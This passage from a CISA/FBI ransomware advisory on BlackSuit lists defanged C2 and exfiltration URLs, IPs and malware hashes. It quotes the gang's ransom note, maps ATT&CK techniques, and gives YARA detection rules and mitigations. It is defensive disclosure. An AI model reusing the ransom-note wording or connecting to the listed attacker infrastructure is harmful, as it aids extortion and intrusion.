https://1tvnews[.]af/xmlrpc.php
https://avpvuurwerk[.]nl/xmlrpc.php
https://beautyhabits[.]gr/xmlrpc.php
https://interpolyaris[.]ru/xmlrpc.php
https://libertygospeltracts[.]com/xmlrpc.php
https://oldtimertreffen-rethem[.]de/xmlrpc.php
https://parencyivf[.]com/xmlrpc.php
https://pikaluna[.]com/xmlrpc.php
https://stroeck[.]at/xmlrpc.php
URL Association URL associated to BRC4 / Brute Ratel Malicious URLs
megupdate[.]com URL Association URLs associated to Exfiltration Malicious URLs
mystuff[.]bublup[.]com
backblaze[.]com
api[.]backblazeb2[.]com
URL Association URL associated to Cobalt Strike C2 Malicious URLs
provincial-gaiters-gw[.]aws-use1[.]cloud-ara[.]tyk[.]io URL Association URL
associated to Initial Access Download Malicious URLs zoommanager[.]com
Table 10: BlackSuit Ransomware Associated Files and Hash Values Filename Hash
Value – SHA-256 Description Filename 1.exe Hash Value – SHA-256
af9f95497b8503af1a399bc6f070c3bbeabc5aeecd8c09bca80495831ae71e61 Description
Encryptor Filename PowerTool64.exe Hash Value – SHA-256 Description Hacktool
Filename aaa.exe Hash Value – SHA-256
C4A2227CD8D85128EAFEF8EE2298AA105DA892C8B0F37405667C2D1647C35C46 Description
Encryptor Filename aaa.exe Hash Value – SHA-256
8d16a23d5a5630502b09c33fbc571d2261c6c98fecc3a79a1e1129354f930d0a Description
Filename Wen.exe Hash Value – SHA-256
01ce9cfebb29596d0ab7c99e8dbadf1a8409750b183e6bf73e0de021b365be13 Description
Filename etmc.exe Hash Value – SHA-256
a0a4a99948e12309f54911264261d96f0e40d5fd695bab82e95fbc1f9024482e Description
Filename svchost.exe Hash Value – SHA-256
9bbc9784ce3c818a127debfe710ec6ce21e7c9dd0daf4e30b8506a6dba533db4 Description
Data Exfiltration Tool – Renamed version of RClone.exe Filename
locker_N1uYkmEsfoHmT4lK66trUjBuy5gyAj7n.ex_ Hash Value – SHA-256
146335b1be627318ac09476f0c8f8e6e027805e6077673f72d6dce1677a24c78 Description
Filename socks32.exe Hash Value – SHA-256
9493b512d7d15510ebee5b300c55b67f9f2ff1dda64bddc99ba8ba5024113300 Description
Filename C:\users\Administrator\AppData\Local\msa.ps1 Hash Value – SHA-256
Description SystemBC backdoor Filename %APPDATA%\ Zoom\Alternative Workplace
Strategies.js Hash Value – SHA-256
E813F8FAF3AA2EB20E285596413F5088B2D7FD153FE9F72F3FF45735D0FDDCED Description
Gootloader infection Filename C:\Users\Public\socks.ps1 Hash Value – SHA-256
25A6F82936134A6C5C0066F382530B9D6BF2C8DA6FEAFE028F166B1A9D7283CF Description
PowerShell Backdoor
Filename HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run
(Value == socks_powershell) Hash Value – SHA-256 Description Executes
socks.ps1 on reboot Filename share$.zip Hash Value – SHA-256
e3d7c012040962acd66f395d1c5c5f73f305aa1058f2111e8e37d9cb213b80c4 Description
Contains _COPY.bat, PsExec.exe, etmc.exe, and _EXEC.bat to deploy encryptor
(etmc.exe) across environment using domain admin credentials Filename socss.exe
Hash Value – SHA-256
C798B2690C5F16EB2917A679AF3117CFE9C7060FA8BC84FFC3159338EF33508E Description
Malware Filename qq.exe Hash Value – SHA-256
3c8c1b1f53e0767b7291bb1ae605ffa62a93e9c8cc783e4ca47ac84b48320d59 Description
Filename gomer.exe Hash Value – SHA-256 Description A renamed executable of
GMER used for defense evasion Filename 288-csrss.exe Hash Value – SHA-256
ee6ec2810910c6d2a2957f041edd1e39dca4266a1cc8009ae6d7315aba9196f5 Description
Filename 372-winlogon.exe Hash Value – SHA-256
68c57daed0e5899c49b827042bcf3bbeba33b524bd83315a44d889721664dc34 Description
Filename 776-svchost.exe Hash Value – SHA-256
bbb7404419f91f82cedfec915931a9339f04165b27d8878d63827c9ee421ed62 Description
Filename Exe.exe, aaaa.exe, qq.exe Hash Value – SHA-256
338228a3e79f3993abc102cbac2ff253c84965213d59ac30892538cdd9b0a22b Description
Ransomware file Filename Mwntv.sys Hash Value – SHA-256
6332f189cc71df646ff0f1b9b02a005c9ebda3fe7b9712976660746913b030de Description
Potential Tool Ingress Filename Un_A.exe Hash Value – SHA-256 Description
Malicious binary for attempting to disable/uninstall security software Filename
Un_B.erxe Hash Value – SHA-256 Description Malicious binary for attempting to
disable/uninstall security software
Table 11: Batch Script Tools Used by BlackSuit Ransomware Operators and Hash
Values Filename Description Hash Value – SHA-256 Filename 2.bat Description
Batch Script to copy and execute encryptor Hash Value – SHA-256
3041dfc13f356c2f0133a9c11a258f87cb7de1e17bc435e9b623d74bc5e1c6be Filename
C:\share$\_EXEC.bat Description Execute encrypter Hash Value – SHA-256
8F87A1542EE790623896BBAAB933D1883484DE02A7B3D65D6C791D50173A923D Filename
fstart.bat Description A batch script used to enable remote services, perform
anti-forensics, and enable clear-text passwords in memory Hash Value – SHA-256
Filename NLA.bat Description A batch script used to disable Network Level
Authentication (NLA) for Remote Desktop Services (RDS) Hash Value – SHA-256
Filename av.bat Description A batch script that searches for presence of an
application and uninstalls it Hash Value – SHA-256 Filename systeminfo.bat
Description A batch script used for system enumeration Hash Value – SHA-256
Filename mv.bat Description A batch script used to move the PsExec executable
and delete the netscan executable Hash Value – SHA-256
Table 12: IP addresses from BlackSuit Ransomware Deployments (from November 2023
to July 2024) IP Address Time Range of Use Description IP Address
4.231.128[.]59 Time Range of Use July 2024 Description IP associated to reverse
lookup from Socss.exe IP Address 2.18.121[.]83 Time Range of Use July 2024
Description IP associated to reverse lookup from Socss.exe IP Address
40.126.31[.]73 Time Range of Use July 2024 Description IP associated to reverse
lookup from Socss.exe IP Address 20.114.59[.]183 Time Range of Use July 2024
Description IP associated to reverse lookup from Socss.exe IP Address
20.242.39[.]171 Time Range of Use July 2024 Description IP associated to
reverse lookup from Socss.exe IP Address 93.184.221[.]240 Time Range of Use
July 2024 Description IP associated to reverse lookup from Socss.exe IP
Address 2.18.121[.]197 Time Range of Use July 2024 Description IP associated
to reverse lookup from Socss.exe IP Address 52.111.229[.]19 Time Range of Use
July 2024 Description IP associated to reverse lookup from Socss.exe IP
Address 217.20.59[.]36 Time Range of Use July 2024 Description IP associated
to reverse lookup from Socss.exe IP Address 40.79.189[.]58 Time Range of Use
July 2024 Description IP associated to reverse lookup from Socss.exe IP
Address 143[.]244[.]146[.]183:443 Time Range of Use May 2024 Description
Unknown C2 – potential SOCKS Proxy IP Address 45[.]141[.]87[.]218:9000 Time
Range of Use May 2024 Description Arechclient2 Backdoor/SecTopRAT IP Address
45[.]141[.]87[.]218:443 Time Range of Use May 2024 Description Arechclient2
Backdoor/SecTopRAT IP Address 184.174.96[.]16 Time Range of Use May 2024
Description Associated with download of the binary vm.dll IP Address
89.251.22[.]32 Time Range of Use May 2024 Description Cobalt Strike IP Address
135.148.67[.]84 Time Range of Use May 2024 Description Resolves to domain
turnovercheck[.]com IP Address 180.131.145[.]85 Time Range of Use May 2024
Description Associated with malicious PowerShell execution IP Address
180.131.145[.]61 Time Range of Use May 2024 Description SystemBC Command &
Control IP Address 138.199.53[.]226 Time Range of Use Feb 2024 Description
IP Address 184.166.211[.]74 Time Range of Use Feb 2024 Description IP
Address 185.190.24[.]103 Time Range of Use Feb 2024 Description IP Address
5.181.234[.]58 Time Range of Use Feb 2024 Description IP Address
137.220.61[.]94 Time Range of Use Nov – Feb 2024 Description connecting
outbound from Socss.exe IP Address 193.37.69[.]116 Time Range of Use Nov – Jan
2024 Description Associated with exfiltration IP Address 144.202.120[.]122
Time Range of Use Nov 2023 Description socks1.ps1 backdoor; SystemBC Backdoor
C2; www.recruitment-interview[.]org (C2 SystemBC) IP Address
104.21.58[.]219:443 Time Range of Use Nov 2023 Description Cobalt Strike IP
Address 141.98.80[.]181:80 Time Range of Use Nov 2023 Description Cobalt
Strike IP Address 144.202.120[.]122:433 Time Range of Use Nov 2023 Description
PowerShell Reverse Proxy IP Address 155.138.150[.]236:8088 Time Range of Use
Nov 2023 Description PowerShell Reverse Proxy IP Address 140.82.18[.]48 Time
Range of Use Nov 2023 Description IP Address 141.98.80[.]181 Time Range of
Use Nov 2023 Description IP Address 44.202.120[.]122 Time Range of Use Nov
2023 Description IP Address 45.76.225[.]156 Time Range of Use Nov 2023
Description
Table 13: Legitimate Files and Tools Used by Black Suit Ransomware (1 of 3) File
name Hash Value – SHA-256 Description File name share.exe Hash Value – SHA-256
f02af8ffc37d1874b971307fdec80e33e583b56d9ebabda78a4b8ad038bc3bf0 Description
Cobalt Strike File name 181.exe Hash Value – SHA-256
b028eaa0ec452c6844881dc34be813834813a40591b89ea9a57dd4fb4084e477 Description
Cobalt Strike – File name File name 222wqc.exe Hash Value – SHA-256
ae724dce252c7b05a84bc264993172cf86950d22744b5e3a1b15ba645d9d3733 Description
Cobalt Strike File name gmer.exe Hash Value – SHA-256 Description GMER /
Rootkit Hunter File name PowerTool64.exe Hash Value – SHA-256 Description
PowerTool64 for hacking File name Psexesvc.exe Hash Value – SHA-256
141b2190f51397dbd0dfde0e3904b264c91b6f81febc823ff0c33da980b69944 Description
Sysinternals File name
Socks5.ps1
Socks.ps1
Hash Value – SHA-256
25a6f82936134a6c5c0066f382530b9d6bf2c8da6feafe028f166b1a9d7283cf Description
PowerShell Reverse Proxy File name netscan.exe Hash Value – SHA-256
Description A network reconnaissance tool File name 3iSDtcX.exe Hash Value –
SHA-256 e87512ea12288acec611cf8e995c4ced3971d9e35c0c5dcfd9ee17c9e3ed913d
Description Putty suite File name File.exe Hash Value – SHA-256
f805dafb3c0b7e18aa7d8c96db8e8d4e9301ff619622d1aecc8080e0ecd9ebbe Description
Putty.exe. Possibly used for C2 File name Mwntv.sys Hash Value – SHA-256
6332f189cc71df646ff0f1b9b02a005c9ebda3fe7b9712976660746913b030de Description
Potential Tool Ingress File name AnyDesk Hash Value – SHA-256
1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499 Description
Potential remote access tool File name ScreenConnect Hash Value – SHA-256
420db40d26d309d3dba3245abb91207f1bca050530545a8048f856e5840d22a2 Description
Potential remote access tool File name SharpShares.exe Hash Value – SHA-256
Description Enumerate network shares File name Networx.exe Hash Value – SHA-256
Description Bandwidth utilization
Table 14: Legitimate Files and Tools Used by Black Suit Ransomware (2 of 3)
Filename Hash Value – SHA-1 Description Filename 181[.]exe Hash Value – SHA-1
790d40cd16fb458bf99e3600bce29eca06d40b56 Description Cobalt Strike – Host name
Table 15: Legitimate Files and Tools Used by Black Suit Ransomware (3 of 3)
Filename File Path Description Filename Anydesk.exe File Path C:\Program
Files(x86)\AnyDesk\AnyDesk.exe Description Remote Monitoring and Management
(RMM) Tool Filename ehorus_display.exe File Path C:\Program
Files\ehorus_agent\ehorus_display\ehorus_display.exe Description RMM Tool
Filename ehorus_launcher.exe File Path C:\Program
Files\ehorus_agent\ehorus_launcher.exe Description RMM Tool
Table 16: Domain(s) associated to BlackSuit Ransomware Domain Name Description
Domain Name Abbeymathiass[.]com Description Cobalt Strike C2 Domain Name
Mail.abbeymathiass[.]com Description Cobalt Strike C2 Domain Name
Store.abbeymathiass[.]com Description Cobalt Strike C2 Domain Name
https://file[.]io/ScPd1KcJTtxO Description Associated with download of the
binary disabler.exe by threat actors Domain Name Mail.turnovercheck[.]com
Description Cobalt Strike C2 Domain Name Store.turnovercheck[.]com Description
Cobalt Strike C2 Domain Name turnovercheck[.]com Description Cobalt Strike C2
Domain Name Hourlyprofitstore[.]com Description Cobalt Strike Domain Name IPs
and Domains for downloads / C2 / exfiltration of communication Description
https://protect-us.mimecast[.]com/s/A2PyC31xN5IpzR0XUvzaAj?domain=5.181.157.8
https://protect-us.mimecast[.]com/s/CcsrC4xyO7fBK73ztjNfPl?domain=5.181.234.58
https://protect-us.mimecast[.]com/s/NwueC5yzP5IZLW4MulfSrc?domain=137.220.61.94
https://protect-us.mimecast[.]com/s/T3InC2kwM5hpzEOVU9S5zn?domain=147.135.36.162
https://protect-us.mimecast[.]com/s/teBrC1wvL8iMNE56tXga0n?domain=147.135.11.223
Table 17: BlackSuit Ransomware Note and Hash Value File Name Hash Value
Description File Name readme.BlackSuit.txt Hash Value
1743494f803bbcbd11150a4a8b7a2c5faba1223da607f67d24b18ca2d95d5ba3 Description
Ransomware note
RANSOM NOTE (NEW AUGUST 7, 2024)
Figure 1 shows the observed BlackSuit ransom notes delivered to victims.
Figure 1. BlackSuit Ransom Note
Your safety service did a really poor job of protecting your files against our
professionals.
Extortioner named BlackSuit has attacked your system.
As a result all your essential files were encrypted and saved at a secure server
for further use and publishing on the Web into the public realm.
Now we have all your files like: financial reports, intellectual property,
accounting, law actions and complaints, personal files and so on and so forth.
We are able to solve this problem in one touch.
We (BlackSuit) are ready to give you an opportunity to get all the things back
if you agree to make a deal with us.
You have a chance to get rid of all possible financial, legal, insurance and
many others risks and problems for a quite small compensation.
You can have a safety review of your systems.
All your files will be decrypted, your data will be reset, your systems will
stay in safe.
Contact us through TOR browser using the link:
MITRE ATT&CK TACTICS AND TECHNIQUES
See Table 18 through Table 23 for all referenced threat actor tactics and
techniques in this advisory, as well as corresponding detection and/or
mitigation recommendations. For additional mitigations, see the Mitigations
section.
Table 18: BlackSuit Actors ATT&CK Techniques for Resource Development Technique
Title ID Use Technique Title Acquire Access ID T1650(link is external) Use
BlackSuit actors may leverage brokers in support of gaining initial access.
Table 19: Cyber Threat Actors ATT&CK Techniques for Initial Access Technique
Title ID Use Technique Title Remote Services: Remote Desktop Protocol ID
T1021.001(link is external) Use BlacSuit actors use RDP compromise as secondary
initial access vector. Technique Title External Remote Services ID T1133(link is
external) Use BlackSuit actors gain initial access through a variety of RMM
software. Technique Title Exploit Public Facing Application ID T1190(link is
external) Use BlackSuit actors gain initial access through public-facing
applications. Technique Title Phishing ID T1566(link is external) Use BlackSuit
actors most commonly gain initial access to victim networks via phishing.
Technique Title Phishing: Spear phishing Attachment ID T1566.001(link is
external) Use BlackSuit actors used malicious PDF document attachments in
phishing campaigns. Technique Title Phishing: Spear phishing Link ID
T1566.002(link is external) Use The actors gain initial access using
malvertising links via emails and public-facing sites.
Table 20: Cyber Threat Actors ATT&CK Techniques for Privilege Escalation
Technique Title ID Use Technique Title (New August 7, 2024) Valid Accounts ID
T1078(link is external) Use BlackSuit actors used a legitimate admin account to
gain access privileges to the domain controller. Technique Title Valid
Accounts: Domain Accounts ID T1078.002(link is external) Use BlackSuit actors
used encrypted files to create new admin user accounts.
Table 21: Cyber Threat Actors ATT&CK Techniques for Defense Evasion Technique
Title ID Use Technique Title Remote Services: Remote Desktop Protocol ID
T1021.001(link is external) Use BlackSuit actors used valid accounts to move
laterally through the domain controller using RDP. Technique Title Indicator
Removal: Clear Windows Event Logs ID T1070.001(link is external) Use BlackSuit
actors deleted shadow files and system and security logs after exfiltration.
Technique Title Automated Collection ID T1119(link is external) Use BlackSuit
actors used registry keys to auto-extract and collect files. Technique Title
Domain Policy Modification: Group Policy Modification ID T1484.001(link is
external) Use BlackSuit actors modified Group Policy Objects to subvert
antivirus protocols. Technique Title Impair Defenses: Disable or Modify Tools ID
T1562.001(link is external) Use BlackSuit actors deactivated antivirus
protocols.
Table 22: Cyber Threat Actors ATT&CK Techniques for Command and Control
Technique Title ID Use Technique Title Ingress Tool Transfer ID T1105(link is
external) Use BlackSuit actors used C2 infrastructure to download multiple
tools. Technique Title Protocol Tunneling ID T1572(link is external) Use
BlackSuit actors used an encrypted SSH tunnel to communicate within C2
infrastructure.
Table 23: Cyber Threat Actors ATT&CK Techniques for Impact Technique Title ID
Use Technique Title Data Encrypted for Impact ID T1486(link is external) Use
BlackSuit actors encrypted data to determine which files were being used or
blocked by other applications.
DETECTION METHODS
(New August 7, 2024) Please reference YARA rule below to aid in detecting
BlackSuit activity. Note: The YARA rule is derived from FBI investigations and
is not guaranteed to detect confirmed malicious activity.
private rule is_executable {
condition:
uint32(uint32(0x3C)) == 0x00004550
}
rule obfuscates_dlls {
strings:
// Code for unscrambling names of true DLL imports
$code_load_obfuscated = {
c6 84 24 ?? 00 00 00 ??
c6 84 24 ?? 00 00 00 ??
c6 84 24 ?? 00 00 00 ??
c6 84 24 ?? 00 00 00 ??
c6 84 24 ?? 00 00 00 ??
c6 84 24 ?? 00 00 00 ??
c6 84 24 ?? 00 00 00 ??
c6 84 24 ?? 00 00 00 ??
}
// c6 84 24 ?? 00 00 00 ?? | MOV byte
ptr [ESP + ??], ??
$code_deobfuscate = { 99 f7 ?? 8d ?? ?? 99 f7 ?? 88}
//
99 | CDQ
// f7 ??
| IDIV ??
// 8d ??
?? | LEA ??, ??
//
99 | CDQ
// f7 ??
| IDIV ??
//
88 | MOV
condition:
all of them
}
rule calls_rsa_function {
strings:
// Code for function calls using RSA key
$code_rsa_function_1 = { 8d4c2410 6a?? 6a?? 51 6a?? 6a??
6a?? 68???????? ffd0 }
// 8d 4c 24 10 |
LEA ECX, [esp + 0x10]
// 6a
?? | PUSH ??
// 6a
?? | PUSH ??
//
51 | PUSH ECX
// 6a
?? | PUSH ??
// 6a
?? | PUSH ??
// 6a
?? | PUSH ??
// 68 ?? ?? ?? ?? | PUSH
(address of RSA string)
// ff
d0 | CALL EAX
$code_rsa_function_2 = { 8d4c2410 6a?? 6a?? 51 56 6a??
6a?? 68???????? ffd0 }
// 8d 4c 24 10 |
LEA ECX, [esp + 0x10]
// 6a
?? | PUSH ??
// 6a
?? | PUSH ??
//
51 | PUSH ECX
//
56 | PUSH ESI
// 6a
?? | PUSH ??
// 6a
?? | PUSH ??
// 68 ?? ?? ?? ?? | PUSH
(address of RSA string)
// ff
d0 | CALL EAX
condition:
any of them
}
rule xor_decoder_functions {
strings:
// Functions 402e00 and 402f00 both appear to contain a
xor-decoding loop
// 402e00
$code_xor_loop_1 = { 0f a4 ce ?? 0f ac d5 ?? c1 e1 ?? c1
ea ?? 0b cd 0b f2 99 33 c8 }
// 0f a4 ce ?? |
SHLD ESI, param_1, ??
// 0f ac d5 ?? |
SHRD EBP, EDX, ??
// c1 e1
?? | SHL param_1, ??
// c1 ea
?? | SHR EDX, 0x19
// 0b
cd | OR param_1, EBP
// 0b f2
| OR ESI, EDX
//
99 | CDQ
// 33
c8 | XOR param_1, EAX
// 402f00
$code_xor_loop_2 = { 0f a4 ce ?? c1 ea ?? 0b f2 c1 e1 ??
0b c8 0f be c3 8a 1f 99 33 c8 }
// 0f a4 ce ?? |
SHLD ESI, param_1, ??
// c1 ea
?? | SHR EDX, ??
// 0b f2
| OR ESI, EDX
// c1 e1
?? | SHL, param_1, ??
// 0b
c8 | OR param_1, EDX
// 0f be
c3 | MOVSX EAX, BL
// 8a 1f
| BL, byte ptr [EDI]
//
99 | CDQ
// 33
c8 | XOR param_1, EAX
condition:
any of them
}
rule win_BlackSuit_manual {
meta:
author = "CVH - Raleigh"
date = "2024-07-12"
version = "1"
description = "Detects win.BlackSuit. Rules were manually constructed
and results should not be considered conclusive."
malpedia_reference =
"https://malpedia.caad.fkie.fraunhofer.de/details/win.BlackSuit"
strings:
// Somehow keeps this in plaintext, although in UTF-16
$string_readme = "readme.BlackSuit.txt" nocase wide
ascii
// RSA key for encrypting AES encryption key present in
plaintext
$string_rsa_key = "BEGIN RSA PUBLIC KEY" nocase wide
ascii
// Unusual debug strings
$string_debug_1 = ".rdata$voltmd"
$string_debug_2 = ".rdata$zzzdbg"
// Relevant functions calls
$import_1 = "MultiByteToWideChar"
$import_2 = "EnterCriticalSection"
$import_3 = "GetProcessHeap"
condition:
(is_executable and $string_readme)
Or
($string_readme and
(obfuscates_dlls or calls_rsa_function or
xor_decoder_functions)
)
or
2 of (obfuscates_dlls, calls_rsa_function,
xor_decoder_functions)
or
1 of (obfuscates_dlls, calls_rsa_function,
xor_decoder_functions) and any of them
}
MITIGATIONS
NETWORK DEFENDERS
The FBI and CISA recommend network defenders implement the mitigations below to
improve your organization’s cybersecurity posture based on BlackSuit actor’s
activity. These mitigations align with the Cross-Sector Cybersecurity
Performance Goals (CPGs) developed by CISA and the National Institute of
Standards and Technology (NIST). The CPGs provide a minimum set of practices and
protections that CISA and NIST recommend all organizations implement. CISA and
NIST based the CPGs on existing cybersecurity frameworks and guidance to protect
against the most common and impactful threats, tactics, techniques, and
procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more
information on the CPGs, including additional recommended baseline protections.
* Implement a recovery planto maintain and retain multiple copies of sensitive
or proprietary data and servers in a physically separate, segmented, and
secure location (i.e., hard drive, storage device, the cloud).
* Require all accounts with password logins (e.g., service account, admin
accounts, and domain admin accounts) to comply with National Institute for
Standards and Technology (NIST) standards for developing and managing
password policies.
* Use longer passwords consisting of at least 8 characters and no more than
64 characters in length;
* Store passwords in hashed format using industry-recognized password
managers;
* Add password user “salts” to shared login credentials;
* Avoid reusing passwords;
* Implement multiple failed login attempt account lockouts;
* Disable password “hints;”
* Refrain from requiring password changes more frequently than once per
year.
* Note: NIST guidance suggests favoring longer passwords instead of requiring
regular and frequent password resets. Frequent password resets are more
likely to result in users developing password “patterns” cyber criminals
can easily decipher.
* Require administrator credentials to install software.
* Keep all operating systems, software, and firmware up to date [CPG 1.E].
Timely patching is one of the most efficient and cost-effective steps an
organization can take to minimize its exposure to cybersecurity threats.
Prioritize patching known exploited vulnerabilities in internet-facing
systems.
* Require Phishing-Resistant multifactor authentication to administrator
accounts [CPG 2.H], and require standard MFA for all services to the extent
possible, particularly for webmail, virtual private networks, and accounts
that access critical systems.
* Segment networks [CPG 2.F] to prevent the spread of ransomware. Network
segmentation can help prevent the spread of ransomware by controlling traffic
flows between—and access to—various subnetworks and by restricting adversary
lateral movement.
* Identify, detect, and investigate abnormal activity and potential traversal
of the indicated ransomware with a networking monitoring tool [CPG 3.A]. To
aid in detecting the ransomware, implement a tool that logs and reports all
network traffic, including lateral movement activity on a network. Endpoint
detection and response (EDR) tools are particularly useful for detecting
lateral connections as they have insight into common and uncommon network
connections for each host.
* Install, regularly update, and enable real time detection for antivirus
software on all hosts.
* Implement Secure Logging Collection and Storage Practices [CPG 2.T]. Learn
more on logging best practices by referencing CISA’s Logging Made Easy
resources.
* Review domain controllers, servers, workstations, and active directories for
new and/or unrecognized accounts.
* Audit user accounts with administrative privileges and configure access
controls according to the principle of least privilege.
* Disable unused ports.
* Implement and Enforce Email Security Policies [CPG 2.M].
* Disable Macros by Default [CPG 2.N].
* Consider adding an email banner to emails received from outside your
organization.
* Disable hyperlinks in received emails.
* Implement time-based access for accounts set at the admin level and higher.
For example, the Just-in-Time (JIT) access method provisions privileged
access when needed and can support enforcement of the principle of least
privilege (as well as the Zero Trust model). This is a process where a
network-wide policy is set in place to automatically disable admin accounts
at the Active Directory level when the account is not in direct need.
Individual users may submit their requests through an automated process that
grants them access to a specified system for a set timeframe when they need
to support the completion of a certain task.
* Disable command-line and scripting activities and permissions. Privilege
escalation and lateral movement often depend on software utilities running
from the command line. If threat actors are not able to run these tools, they
will have difficulty escalating privileges and/or moving laterally.
* Maintain offline backups of data, and regularly maintain backup and
restoration [CPG 2.R]. By instituting this practice, the organization ensures
they will not be severely interrupted, and/or only have irretrievable data.
* Ensure all backup data is encrypted, immutable (i.e., cannot be altered or
deleted), and covers the entire organization’s data infrastructure.
SOFTWARE MANUFACTURERS
The above mitigations apply to enterprises and critical infrastructure
organizations with on-premises or hybrid environments. Recognizing that insecure
software is the root cause of the majority of these flaws and that the
responsibility should not be on the end user, CISA urges software manufacturers
to implement the following to reduce the prevalence of <identified or exploited
issues (e.g., misconfigurations, weak passwords, and other weaknesses identified
and exploited through the assessment team)>:
* Embed security into product architecture throughout the entire software
development lifecycle (SDLC).
* Mandate MFA, ideally phishing-resistant MFA, for privileged users and make
MFA a default, rather than opt-in, feature.
These mitigations align with tactics provided in the joint guide Shifting the
Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design
Software. CISA urges software manufacturers to take ownership of improving the
security outcomes of their customers by applying these and other secure by
design tactics. By using secure by design tactics, software manufacturers can
make their product lines secure “out of the box” without requiring customers to
spend additional resources making configuration changes, purchasing security
software and logs, monitoring, and making routine updates.
For more information on secure by design, see CISA’s Secure by Design webpage.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, the FBI and CISA recommend exercising,
testing, and validating your organization's security program against the threat
behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory.
The FBI and CISA recommend testing your existing security controls inventory to
assess how they perform against the ATT&CK techniques described in this
advisory.
To get started:
1. Select an ATT&CK technique described in this advisory (see Table 18 – Table
23).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of
comprehensive performance data.
6. Tune your security program, including people, processes, and technologies,
based on the data generated by this process.
The FBI and CISA recommend continually testing your security program, at scale,
in a production environment to ensure optimal performance against the MITRE
ATT&CK techniques identified in this advisory.
RESOURCES
* Stopransomware.gov is a whole-of-government approach that gives one central
location for ransomware resources and alerts.
* Resource to mitigate a ransomware attack: CISA-Multi-State Information
Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
Note: The joint Ransomware Guide provides preparation, prevention, and
mitigation best practices as well as a ransomware response checklist.
* No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware
Readiness Assessment(link is external).
REPORTING
Your organization has no obligation to respond or provide information back to
the FBI in response to this joint CSA. If, after reviewing the information
provided, your organization decides to provide information to the FBI, reporting
must be consistent with applicable state and federal laws.
The FBI is interested in any information that can be shared, to include boundary
logs showing communication to and from foreign IP addresses, a sample ransom
note, communications with BlackSuit actors, Bitcoin wallet information,
decryptor files, and/or a benign sample of an encrypted file.
Additional details of interest include: a targeted company point of contact,
status, and scope of infection, estimated loss, operational impact, transaction
IDs, date of infection, date detected, initial attack vector, and host- and
network-based indicators.
The FBI and CISA do not encourage paying ransom as payment does not guarantee
victim files will be recovered. Furthermore, payment may also embolden
adversaries to target additional organizations, encourage other criminal actors
to engage in the distribution of ransomware, and/or fund illicit activities.
Regardless of whether you or your organization have decided to pay the ransom,
the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s
Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the
agency’s Incident Reporting System or its 24/7 Operations Center
(report@cisa.gov(link sends email) or by calling 1-844-Say-CISA
(1-844-729-2472).
DISCLAIMER
Your organization has no obligation to respond or provide information in
response to this product. If, after reviewing the information provided, your
organization decides to provide information to the authoring agencies, it must
do so consistent with applicable state and federal law.
The information in this report is being provided “as is” for informational
purposes only. FBI and CISA do not endorse any commercial entity, product,
company, or service, including any entities, products, or services linked within
this document. Any reference to specific commercial entities, products,
processes, or services by service mark, trademark, manufacturer, or otherwise,
does not constitute or imply endorsement, recommendation, or favoring by FBI and
CISA.
VERSION HISTORY
January 31, 2023: Initial Release (Royal Ransomware)
November 13, 2023: First Update (Royal Ransomware)
August 7, 2024: Updated title from “Royal Ransomware” to “BlackSuit Ransomware”;
updates noted throughout.
This product is provided subject to this Notification and this Privacy &
Use policy.
TAGS
Topics
Cyber Threats and Advisories, Incident Detection, Response, and Prevention,
Malware, Phishing, and Ransomware
Audience
Educational Institutions
Sector
Communications Sector, Critical Manufacturing Sector, Healthcare and Public
Health Sector
MITRE ATT&CK TTP
Command and Control (TA0011), Defense Evasion (TA0005), Impact (TA0040), Initial
Access (TA0001), Privilege Escalation (TA0004), Resource Development (TA0042)
Co-Sealers and Partners
Federal Bureau of Investigation
PLEASE SHARE YOUR THOUGHTS
We recently updated our anonymous product survey; we’d welcome your feedback.
RELATED ADVISORIES
Jul 25, 2024
Cybersecurity Advisory | AA24-207A
NORTH KOREA CYBER GROUP CONDUCTS GLOBAL ESPIONAGE CAMPAIGN TO ADVANCE REGIME’S
MILITARY AND NUCLEAR PROGRAMS
Jul 11, 2024
Cybersecurity Advisory | AA24-193A
CISA RED TEAM’S OPERATIONS AGAINST A FEDERAL CIVILIAN EXECUTIVE BRANCH
ORGANIZATION HIGHLIGHTS THE NECESSITY OF DEFENSE-IN-DEPTH
Jul 08, 2024
Cybersecurity Advisory | AA24-190A
PEOPLE’S REPUBLIC OF CHINA (PRC) MINISTRY OF STATE SECURITY APT40 TRADECRAFT IN
ACTION
May 10, 2024
Cybersecurity Advisory | AA24-131A
#STOPRANSOMWARE: BLACK BASTA
Return to top
* Topics
* Spotlight
* Resources & Tools
* News & Events
* Careers
* About
Cybersecurity & Infrastructure Security Agency
* Facebook
* Twitter
* LinkedIn
* YouTube
* Instagram
* RSS
CISA Central 1-844-Say-CISA SayCISA@cisa.gov
DHS Seal
CISA.gov
An official website of the U.S. Department of Homeland Security
* About CISA
* Budget and Performance
* DHS.gov
* Equal Opportunity & Accessibility
* FOIA Requests
* No FEAR Act
* Office of Inspector General
* Privacy Policy
* Subscribe
* The White House
* USA.gov
* Website Feedback